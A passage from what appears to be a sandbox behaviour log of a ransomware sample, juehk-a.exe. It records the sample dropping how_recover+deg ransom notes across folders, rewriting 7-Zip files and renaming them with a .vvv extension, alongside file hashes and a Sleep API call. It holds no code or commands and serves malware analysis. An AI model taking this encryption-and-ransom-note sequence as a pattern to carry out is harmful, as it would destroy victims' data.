9500.          ntstatus: 0x0
9501.          CreateOptions: 0x60
9502.        file:
9503.          timestamp: 53899
9504.          mode: close
9505.          sequenceNumber: 705
9506.          value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.txt
9507.          filesize: 2673
9508.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9509.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9510.          processinfo:
9511.            pid: 1648
9512.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9513.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9514.            ads:
9515.          fid (ads:): 562949953521085
9516.          ntstatus: 0x0
9517.          CreateOptions: 0x0
9518.        file:
9519.          timestamp: 53906
9520.          mode: created
9521.          sequenceNumber: 706
9522.          value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.html
9523.          processinfo:
9524.            pid: 1648
9525.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9526.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9527.            ads:
9528.          fid (ads:): 562949953521086
9529.          ntstatus: 0x0
9530.          CreateOptions: 0x60
9531.        file:
9532.          timestamp: 53912
9533.          mode: close
9534.          sequenceNumber: 707
9535.          value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.html
9536.          filesize: 9480
9537.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9538.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9539.          processinfo:
9540.            pid: 1648
9541.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9542.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9543.            ads:
9544.          fid (ads:): 562949953521086
9545.          ntstatus: 0x0
9546.          CreateOptions: 0x0
9547.        file:
9548.          timestamp: 53917
9549.          mode: created
9550.          sequenceNumber: 708
9551.          value: C:\MSOCache\All Users\how_recover+deg.txt
9552.          processinfo:
9553.            pid: 1648
9554.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9555.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9556.            ads:
9557.          fid (ads:): 562949953521087
9558.          ntstatus: 0x0
9559.          CreateOptions: 0x60
9560.        file:
9561.          timestamp: 53922
9562.          mode: close
9563.          sequenceNumber: 709
9564.          value: C:\MSOCache\All Users\how_recover+deg.txt
9565.          filesize: 2673
9566.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9567.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9568.          processinfo:
9569.            pid: 1648
9570.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9571.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9572.            ads:
9573.          fid (ads:): 562949953521087
9574.          ntstatus: 0x0
9575.          CreateOptions: 0x0
9576.        file:
9577.          timestamp: 53928
9578.          mode: created
9579.          sequenceNumber: 710
9580.          value: C:\MSOCache\All Users\how_recover+deg.html
9581.          processinfo:
9582.            pid: 1648
9583.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9584.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9585.            ads:
9586.          fid (ads:): 562949953521088
9587.          ntstatus: 0x0
9588.          CreateOptions: 0x60
9589.        file:
9590.          timestamp: 53933
9591.          mode: close
9592.          sequenceNumber: 711
9593.          value: C:\MSOCache\All Users\how_recover+deg.html
9594.          filesize: 9480
9595.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9596.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9597.          processinfo:
9598.            pid: 1648
9599.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9600.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9601.            ads:
9602.          fid (ads:): 562949953521088
9603.          ntstatus: 0x0
9604.          CreateOptions: 0x0
9605.        file:
9606.          timestamp: 53938
9607.          mode: created
9608.          sequenceNumber: 712
9609.          value: C:\MSOCache\how_recover+deg.txt
9610.          processinfo:
9611.            pid: 1648
9612.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9613.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9614.            ads:
9615.          fid (ads:): 844424930231745
9616.          ntstatus: 0x0
9617.          CreateOptions: 0x60
9618.        file:
9619.          timestamp: 53942
9620.          mode: close
9621.          sequenceNumber: 713
9622.          value: C:\MSOCache\how_recover+deg.txt
9623.          filesize: 2673
9624.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9625.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9626.          processinfo:
9627.            pid: 1648
9628.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9629.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9630.            ads:
9631.          fid (ads:): 844424930231745
9632.          ntstatus: 0x0
9633.          CreateOptions: 0x0
9634.        file:
9635.          timestamp: 54018
9636.          mode: created
9637.          sequenceNumber: 714
9638.          value: C:\MSOCache\how_recover+deg.html
9639.          processinfo:
9640.            pid: 1648
9641.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9642.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9643.            ads:
9644.          fid (ads:): 844424930231746
9645.          ntstatus: 0x0
9646.          CreateOptions: 0x60
9647.        file:
9648.          timestamp: 54022
9649.          mode: close
9650.          sequenceNumber: 715
9651.          value: C:\MSOCache\how_recover+deg.html
9652.          filesize: 9480
9653.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9654.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9655.          processinfo:
9656.            pid: 1648
9657.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9658.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9659.            ads:
9660.          fid (ads:): 844424930231746
9661.          ntstatus: 0x0
9662.          CreateOptions: 0x0
9663.        file:
9664.          timestamp: 54090
9665.          mode: created
9666.          sequenceNumber: 716
9667.          value: C:\PerfLogs\Admin\how_recover+deg.txt
9668.          processinfo:
9669.            pid: 1648
9670.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9671.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9672.            ads:
9673.          fid (ads:): 562949953521091
9674.          ntstatus: 0x0
9675.          CreateOptions: 0x60
9676.        file:
9677.          timestamp: 54094
9678.          mode: close
9679.          sequenceNumber: 717
9680.          value: C:\PerfLogs\Admin\how_recover+deg.txt
9681.          filesize: 2673
9682.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9683.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9684.          processinfo:
9685.            pid: 1648
9686.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9687.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9688.            ads:
9689.          fid (ads:): 562949953521091
9690.          ntstatus: 0x0
9691.          CreateOptions: 0x0
9692.        file:
9693.          timestamp: 54134
9694.          mode: created
9695.          sequenceNumber: 718
9696.          value: C:\PerfLogs\Admin\how_recover+deg.html
9697.          processinfo:
9698.            pid: 1648
9699.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9700.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9701.            ads:
9702.          fid (ads:): 562949953521092
9703.          ntstatus: 0x0
9704.          CreateOptions: 0x60
9705.        file:
9706.          timestamp: 54139
9707.          mode: close
9708.          sequenceNumber: 719
9709.          value: C:\PerfLogs\Admin\how_recover+deg.html
9710.          filesize: 9480
9711.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9712.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9713.          processinfo:
9714.            pid: 1648
9715.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9716.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9717.            ads:
9718.          fid (ads:): 562949953521092
9719.          ntstatus: 0x0
9720.          CreateOptions: 0x0
9721.        file:
9722.          timestamp: 54148
9723.          mode: created
9724.          sequenceNumber: 720
9725.          value: C:\PerfLogs\how_recover+deg.txt
9726.          processinfo:
9727.            pid: 1648
9728.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9729.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9730.            ads:
9731.          fid (ads:): 562949953521093
9732.          ntstatus: 0x0
9733.          CreateOptions: 0x60
9734.        file:
9735.          timestamp: 54155
9736.          mode: close
9737.          sequenceNumber: 721
9738.          value: C:\PerfLogs\how_recover+deg.txt
9739.          filesize: 2673
9740.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9741.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9742.          processinfo:
9743.            pid: 1648
9744.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9745.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9746.            ads:
9747.          fid (ads:): 562949953521093
9748.          ntstatus: 0x0
9749.          CreateOptions: 0x0
9750.        file:
9751.          timestamp: 54160
9752.          mode: created
9753.          sequenceNumber: 722
9754.          value: C:\PerfLogs\how_recover+deg.html
9755.          processinfo:
9756.            pid: 1648
9757.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9758.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9759.            ads:
9760.          fid (ads:): 562949953521094
9761.          ntstatus: 0x0
9762.          CreateOptions: 0x60
9763.        file:
9764.          timestamp: 54164
9765.          mode: close
9766.          sequenceNumber: 723
9767.          value: C:\PerfLogs\how_recover+deg.html
9768.          filesize: 9480
9769.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9770.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9771.          processinfo:
9772.            pid: 1648
9773.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9774.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9775.            ads:
9776.          fid (ads:): 562949953521094
9777.          ntstatus: 0x0
9778.          CreateOptions: 0x0
9779.        file:
9780.          timestamp: 54169
9781.          mode: created
9782.          sequenceNumber: 724
9783.          value: C:\Program Files\699jsSFHhCS\how_recover+deg.txt
9784.          processinfo:
9785.            pid: 1648
9786.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9787.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9788.            ads:
9789.          fid (ads:): 562949953521095
9790.          ntstatus: 0x0
9791.          CreateOptions: 0x60
9792.        file:
9793.          timestamp: 54174
9794.          mode: close
9795.          sequenceNumber: 725
9796.          value: C:\Program Files\699jsSFHhCS\how_recover+deg.txt
9797.          filesize: 2673
9798.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9799.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9800.          processinfo:
9801.            pid: 1648
9802.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9803.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9804.            ads:
9805.          fid (ads:): 562949953521095
9806.          ntstatus: 0x0
9807.          CreateOptions: 0x0
9808.        file:
9809.          timestamp: 54441
9810.          mode: created
9811.          sequenceNumber: 726
9812.          value: C:\Program Files\699jsSFHhCS\how_recover+deg.html
9813.          processinfo:
9814.            pid: 1648
9815.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9816.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9817.            ads:
9818.          fid (ads:): 562949953521096
9819.          ntstatus: 0x0
9820.          CreateOptions: 0x60
9821.        file:
9822.          timestamp: 54446
9823.          mode: close
9824.          sequenceNumber: 727
9825.          value: C:\Program Files\699jsSFHhCS\how_recover+deg.html
9826.          filesize: 9480
9827.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9828.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9829.          processinfo:
9830.            pid: 1648
9831.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9832.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9833.            ads:
9834.          fid (ads:): 562949953521096
9835.          ntstatus: 0x0
9836.          CreateOptions: 0x0
9837.        file:
9838.          timestamp: 54787
9839.          mode: open
9840.          sequenceNumber: 728
9841.          value: C:\Program Files\7-Zip\History.txt
9842.          filesize: 32400
9843.          processinfo:
9844.            pid: 1648
9845.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9846.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9847.            ads:
9848.          fid (ads:): 562949953519710
9849.          ntstatus: 0x0
9850.          CreateOptions: 0x60
9851.        file:
9852.          timestamp: 55796
9853.          mode: close
9854.          sequenceNumber: 729
9855.          value: C:\Program Files\7-Zip\History.txt
9856.          filesize: 32830
9857.          md5sum: 33401c175a2d6e0bd6227620e2f31de5
9858.          sha1sum: 7d87ab9105fe113563569dbbaf96eb70c438c013
9859.          processinfo:
9860.            pid: 1648
9861.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9862.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9863.            ads:
9864.          fid (ads:): 562949953519710
9865.          ntstatus: 0x0
9866.          CreateOptions: 0x0
9867.        file:
9868.          timestamp: 55855
9869.          mode: rename
9870.          sequenceNumber: 730
9871.          filesize: 32830
9872.          md5sum: 33401c175a2d6e0bd6227620e2f31de5
9873.          sha1sum: 7d87ab9105fe113563569dbbaf96eb70c438c013
9874.          processinfo:
9875.            pid: 1648
9876.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9877.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9878.          old_name: C:\Program Files\7-Zip\History.txt
9879.          new_name: C:\Program Files\7-Zip\History.txt.vvv
9880.            ads:
9881.          fid (ads:): 562949953519710
9882.          ntstatus: 0x0
9883.          CreateOptions: 0x0
9884.        file:
9885.          timestamp: 56245
9886.          mode: open
9887.          sequenceNumber: 731
9888.          value: C:\Program Files\7-Zip\Lang\af.txt
9889.          filesize: 10348
9890.          processinfo:
9891.            pid: 1648
9892.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9893.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9894.            ads:
9895.          fid (ads:): 562949953519716
9896.          ntstatus: 0x0
9897.          CreateOptions: 0x60
9898.        file:
9899.          timestamp: 57438
9900.          mode: close
9901.          sequenceNumber: 732
9902.          value: C:\Program Files\7-Zip\Lang\af.txt
9903.          filesize: 10766
9904.          md5sum: 38b27ac57187325245db40010ef06c51
9905.          sha1sum: 353460c7a85ff8aaf39b1fe54f24167f364fed3d
9906.          processinfo:
9907.            pid: 1648
9908.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9910.            ads:
9911.          fid (ads:): 562949953519716
9912.          ntstatus: 0x0
9913.          CreateOptions: 0x0
9914.        file:
9915.          timestamp: 57527
9916.          mode: rename
9917.          sequenceNumber: 733
9918.          filesize: 10766
9919.          md5sum: 38b27ac57187325245db40010ef06c51
9920.          sha1sum: 353460c7a85ff8aaf39b1fe54f24167f364fed3d
9921.          processinfo:
9922.            pid: 1648
9923.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9924.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9925.          old_name: C:\Program Files\7-Zip\Lang\af.txt
9926.          new_name: C:\Program Files\7-Zip\Lang\af.txt.vvv
9927.            ads:
9928.          fid (ads:): 562949953519716
9929.          ntstatus: 0x0
9930.          CreateOptions: 0x0
9931.        file:
9932.          timestamp: 57796
9933.          mode: open
9934.          sequenceNumber: 734
9935.          value: C:\Program Files\7-Zip\Lang\ar.txt
9936.          filesize: 16900
9937.          processinfo:
9938.            pid: 1648
9939.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9940.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9941.            ads:
9942.          fid (ads:): 562949953519717
9943.          ntstatus: 0x0
9944.          CreateOptions: 0x60
9945.        file:
9946.          timestamp: 58143
9947.          mode: close
9948.          sequenceNumber: 735
9949.          value: C:\Program Files\7-Zip\Lang\ar.txt
9950.          filesize: 17326
9951.          md5sum: 5a3edd99921fa615510a4b98c592c73a
9952.          sha1sum: 64483fb9b1796e455a58db2d123c6fb5c601a214
9953.          processinfo:
9954.            pid: 1648
9955.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9956.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9957.            ads:
9958.          fid (ads:): 562949953519717
9959.          ntstatus: 0x0
9960.          CreateOptions: 0x0
9961.        file:
9962.          timestamp: 58171
9963.          mode: rename
9964.          sequenceNumber: 736
9965.          filesize: 17326
9966.          md5sum: 5a3edd99921fa615510a4b98c592c73a
9967.          sha1sum: 64483fb9b1796e455a58db2d123c6fb5c601a214
9968.          processinfo:
9969.            pid: 1648
9970.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9971.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9972.          old_name: C:\Program Files\7-Zip\Lang\ar.txt
9973.          new_name: C:\Program Files\7-Zip\Lang\ar.txt.vvv
9974.            ads:
9975.          fid (ads:): 562949953519717
9976.          ntstatus: 0x0
9977.          CreateOptions: 0x0
9978.        file:
9979.          timestamp: 58196
9980.          mode: open
9981.          sequenceNumber: 737
9982.          value: C:\Program Files\7-Zip\Lang\ast.txt
9983.          filesize: 10640
9984.          processinfo:
9985.            pid: 1648
9986.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9987.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9988.            ads:
9989.          fid (ads:): 562949953519718
9990.          ntstatus: 0x0
9991.          CreateOptions: 0x60
9992.        file:
9993.          timestamp: 58459
9994.          mode: close
9995.          sequenceNumber: 738
9996.          value: C:\Program Files\7-Zip\Lang\ast.txt
9997.          filesize: 11070
9998.          md5sum: 06309f3541a3ee3a021aeb72902b9837
9999.          sha1sum: 428374af180b895eec50b0de2f1ed59855449844
10000.          processinfo:
10001.            pid: 1648
10002.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10003.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10004.            ads:
10005.          fid (ads:): 562949953519718
10006.          ntstatus: 0x0
10007.          CreateOptions: 0x0
10008.        file:
10009.          timestamp: 58485
10010.          mode: rename
10011.          sequenceNumber: 739
10012.          filesize: 11070
10013.          md5sum: 06309f3541a3ee3a021aeb72902b9837
10014.          sha1sum: 428374af180b895eec50b0de2f1ed59855449844
10015.          processinfo:
10016.            pid: 1648
10017.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10018.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10019.          old_name: C:\Program Files\7-Zip\Lang\ast.txt
10020.          new_name: C:\Program Files\7-Zip\Lang\ast.txt.vvv
10021.            ads:
10022.          fid (ads:): 562949953519718
10023.          ntstatus: 0x0
10024.          CreateOptions: 0x0
10025.        file:
10026.          timestamp: 58501
10027.          mode: open
10028.          sequenceNumber: 740
10029.          value: C:\Program Files\7-Zip\Lang\az.txt
10030.          filesize: 13824
10031.          processinfo:
10032.            pid: 1648
10033.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10034.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10035.            ads:
10036.          fid (ads:): 562949953519719
10037.          ntstatus: 0x0
10038.          CreateOptions: 0x60
10039.        file:
10040.          timestamp: 58685
10041.          mode: close
10042.          sequenceNumber: 741
10043.          value: C:\Program Files\7-Zip\Lang\az.txt
10044.          filesize: 14254
10045.          md5sum: bc4abd6f12dd4f91f66270a3c6240add
10046.          sha1sum: ba33e393b1c771885a90263b7f47f73afe17822b
10047.          processinfo:
10048.            pid: 1648
10049.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10050.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10051.            ads:
10052.          fid (ads:): 562949953519719
10053.          ntstatus: 0x0
10054.          CreateOptions: 0x0
10055.        file:
10056.          timestamp: 58694
10057.          mode: rename
10058.          sequenceNumber: 742
10059.          filesize: 14254
10060.          md5sum: bc4abd6f12dd4f91f66270a3c6240add
10061.          sha1sum: ba33e393b1c771885a90263b7f47f73afe17822b
10062.          processinfo:
10063.            pid: 1648
10064.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10065.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10066.          old_name: C:\Program Files\7-Zip\Lang\az.txt
10067.          new_name: C:\Program Files\7-Zip\Lang\az.txt.vvv
10068.            ads:
10069.          fid (ads:): 562949953519719
10070.          ntstatus: 0x0
10071.          CreateOptions: 0x0
10072.        file:
10073.          timestamp: 58713
10074.          mode: open
10075.          sequenceNumber: 743
10076.          value: C:\Program Files\7-Zip\Lang\ba.txt
10077.          filesize: 18160
10078.          processinfo:
10079.            pid: 1648
10080.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10081.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10082.            ads:
10083.          fid (ads:): 562949953519720
10084.          ntstatus: 0x0
10085.          CreateOptions: 0x60
10086.        file:
10087.          timestamp: 58794
10088.          mode: close
10089.          sequenceNumber: 744
10090.          value: C:\Program Files\7-Zip\Lang\ba.txt
10091.          filesize: 18590
10092.          md5sum: a6e705689486f71879493261a4c18ae9
10093.          sha1sum: e39da4890b31bfe32be51bf30c86877c68d25fa9
10094.          processinfo:
10095.            pid: 1648
10096.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10097.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10098.            ads:
10099.          fid (ads:): 562949953519720
10100.          ntstatus: 0x0
10101.          CreateOptions: 0x0
10102.        file:
10103.          timestamp: 58801
10104.          mode: rename
10105.          sequenceNumber: 745
10106.          filesize: 18590
10107.          md5sum: a6e705689486f71879493261a4c18ae9
10108.          sha1sum: e39da4890b31bfe32be51bf30c86877c68d25fa9
10109.          processinfo:
10110.            pid: 1648
10111.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10112.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10113.          old_name: C:\Program Files\7-Zip\Lang\ba.txt
10114.          new_name: C:\Program Files\7-Zip\Lang\ba.txt.vvv
10115.            ads:
10116.          fid (ads:): 562949953519720
10117.          ntstatus: 0x0
10118.          CreateOptions: 0x0
10119.        file:
10120.          timestamp: 58807
10121.          mode: open
10122.          sequenceNumber: 746
10123.          value: C:\Program Files\7-Zip\Lang\be.txt
10124.          filesize: 18850
10125.          processinfo:
10126.            pid: 1648
10127.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10128.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10129.            ads:
10130.          fid (ads:): 562949953519721
10131.          ntstatus: 0x0
10132.          CreateOptions: 0x60
10133.        file:
10134.          timestamp: 58844
10135.          mode: close
10136.          sequenceNumber: 747
10137.          value: C:\Program Files\7-Zip\Lang\be.txt
10138.          filesize: 19278
10139.          md5sum: d2c99b0b25098f91c29fd7ea5619736a
10140.          sha1sum: 02041064bbf124fbc38a69ac521c363a40993ffd
10141.          processinfo:
10142.            pid: 1648
10143.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10144.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10145.            ads:
10146.          fid (ads:): 562949953519721
10147.          ntstatus: 0x0
10148.          CreateOptions: 0x0
10149.        file:
10150.          timestamp: 58851
10151.          mode: rename
10152.          sequenceNumber: 748
10153.          filesize: 19278
10154.          md5sum: d2c99b0b25098f91c29fd7ea5619736a
10155.          sha1sum: 02041064bbf124fbc38a69ac521c363a40993ffd
10156.          processinfo:
10157.            pid: 1648
10158.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10159.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10160.          old_name: C:\Program Files\7-Zip\Lang\be.txt
10161.          new_name: C:\Program Files\7-Zip\Lang\be.txt.vvv
10162.            ads:
10163.          fid (ads:): 562949953519721
10164.          ntstatus: 0x0
10165.          CreateOptions: 0x0
10166.        file:
10167.          timestamp: 58859
10168.          mode: open
10169.          sequenceNumber: 749
10170.          value: C:\Program Files\7-Zip\Lang\bg.txt
10171.          filesize: 20580
10172.          processinfo:
10173.            pid: 1648
10174.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10176.            ads:
10177.          fid (ads:): 562949953519722
10178.          ntstatus: 0x0
10179.          CreateOptions: 0x60
10180.        file:
10181.          timestamp: 58925
10182.          mode: close
10183.          sequenceNumber: 750
10184.          value: C:\Program Files\7-Zip\Lang\bg.txt
10185.          filesize: 21006
10186.          md5sum: 4477fb1aa5ed372d9502a7d151ce5c55
10187.          sha1sum: f249336bf6cbe24f4948157e9d921e91d8ab1327
10188.          processinfo:
10189.            pid: 1648
10190.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10191.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10192.            ads:
10193.          fid (ads:): 562949953519722
10194.          ntstatus: 0x0
10195.          CreateOptions: 0x0
10196.        file:
10197.          timestamp: 58932
10198.          mode: rename
10199.          sequenceNumber: 751
10200.          filesize: 21006
10201.          md5sum: 4477fb1aa5ed372d9502a7d151ce5c55
10202.          sha1sum: f249336bf6cbe24f4948157e9d921e91d8ab1327
10203.          processinfo:
10204.            pid: 1648
10205.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10206.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10207.          old_name: C:\Program Files\7-Zip\Lang\bg.txt
10208.          new_name: C:\Program Files\7-Zip\Lang\bg.txt.vvv
10209.            ads:
10210.          fid (ads:): 562949953519722
10211.          ntstatus: 0x0
10212.          CreateOptions: 0x0
10213.        file:
10214.          timestamp: 58937
10215.          mode: open
10216.          sequenceNumber: 752
10217.          value: C:\Program Files\7-Zip\Lang\bn.txt
10218.          filesize: 23005
10219.          processinfo:
10220.            pid: 1648
10221.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10222.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10223.            ads:
10224.          fid (ads:): 562949953519723
10225.          ntstatus: 0x0
10226.          CreateOptions: 0x60
10227.        file:
10228.          timestamp: 58979
10229.          mode: close
10230.          sequenceNumber: 753
10231.          value: C:\Program Files\7-Zip\Lang\bn.txt
10232.          filesize: 23422
10233.          md5sum: e402952f91719c7f5dc31e4ce646227f
10234.          sha1sum: 9c52121bb454f86bc91eeb3f90bf35cb937cf381
10235.          processinfo:
10236.            pid: 1648
10237.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10238.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10239.            ads:
10240.          fid (ads:): 562949953519723
10241.          ntstatus: 0x0
10242.          CreateOptions: 0x0
10243.        file:
10244.          timestamp: 58991
10245.          mode: rename
10246.          sequenceNumber: 754
10247.          filesize: 23422
10248.          md5sum: e402952f91719c7f5dc31e4ce646227f
10249.          sha1sum: 9c52121bb454f86bc91eeb3f90bf35cb937cf381
10250.          processinfo:
10251.            pid: 1648
10252.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10254.          old_name: C:\Program Files\7-Zip\Lang\bn.txt
10255.          new_name: C:\Program Files\7-Zip\Lang\bn.txt.vvv
10256.            ads:
10257.          fid (ads:): 562949953519723
10258.          ntstatus: 0x0
10259.          CreateOptions: 0x0
10260.        file:
10261.          timestamp: 59330
10262.          mode: open
10263.          sequenceNumber: 755
10264.          value: C:\Program Files\7-Zip\Lang\br.txt
10265.          filesize: 10645
10266.          processinfo:
10267.            pid: 1648
10268.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10269.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10270.            ads:
10271.          fid (ads:): 562949953519724
10272.          ntstatus: 0x0
10273.          CreateOptions: 0x60
10274.        apicall:
10275.          timestamp: 59423
10276.          repeat: 200
10277.          sequenceNumber: 756
10278.          processinfo:
10279.            pid: 1648
10280.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10281.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10282.          dllname: kernel32.dll
10283.          apiname: Sleep
10284.          address: 0x0041ed5b
10285.        file:
10286.          timestamp: 60028
10287.          mode: close
10288.          sequenceNumber: 757
10289.          value: C:\Program Files\7-Zip\Lang\br.txt
10290.          filesize: 11070
10291.          md5sum: 9455d2c83b2e185ad45eb531e9532bb6
10292.          sha1sum: 4b2759b5c588b1040e9938c08d23eee328311703
10293.          processinfo:
10294.            pid: 1648
10295.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10296.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10297.            ads:
10298.          fid (ads:): 562949953519724
10299.          ntstatus: 0x0
10300.          CreateOptions: 0x0
10301.        file:
10302.          timestamp: 60062
10303.          mode: rename
10304.          sequenceNumber: 758
10305.          filesize: 11070
10306.          md5sum: 9455d2c83b2e185ad45eb531e9532bb6
